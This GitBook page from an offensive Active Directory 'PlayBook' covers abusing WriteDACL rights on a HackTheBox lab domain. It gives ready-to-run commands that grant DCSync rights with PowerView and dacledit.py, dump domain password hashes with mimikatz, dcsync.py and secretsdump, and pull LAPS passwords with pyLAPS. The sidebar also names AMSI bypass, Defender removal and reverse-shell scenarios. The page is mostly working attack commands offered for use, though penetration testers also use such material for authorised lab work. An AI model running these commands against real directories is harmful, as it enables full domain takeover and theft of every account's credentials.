🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  • Windows abuse
  • Linux abuse
  1. Scenarios

WriteDACL Rights

PreviousWinRM requires sslNextAD Allowed to change owner

The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL

With write access to the target object's DACL, you can grant yourself any privilege you want on the object. Including DcSync

Windows abuse

To abuse WriteDacl to a domain object, you may grant yourself DCSync privileges.

You may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:

Add-DomainObjectAcl -TargetIdentity HTB.LOCAL -Rights DCSync -Principalidentity svc-alfresco

Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain

lsadump::dcsync /domain:testlab.local /user:Administrator

Cleanup can be done using the Remove-DomainObjectAcl function:

Remove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync

You can also abuse this without using Windows-based tooling if you are operating from a Linux host. DCSync.py from n00py will let you authenticate with either a plaintext password, NT hash, or kerberos ticket:

To grant the "n00py" user DCSync privileges, authenticating as the user "n00py" with the password "Password123":

./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00pyAdministrator:Password123

Source:

Linux abuse

To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.

Impacket's dacledit can be used for that purpose (cf. "grant rights" reference for the link).

dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'

Cleanup of the added ACL can be performed later on with the same tool:

DCSync

The AllExtendedRights privilege grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges, which combined allow a principal to replicate objects from the domain HTB.LOCAL.

This can be abused using Impacket's secretsdump.py example script:

secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'

Retrieve LAPS Passwords

If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the AllExtendedRights privilege included grants EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL enough privileges to retrieve LAPS passwords domain-wise.

pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"

can be used for that purpose:

⛓️
https://github.com/n00py/DCSync
pyLAPS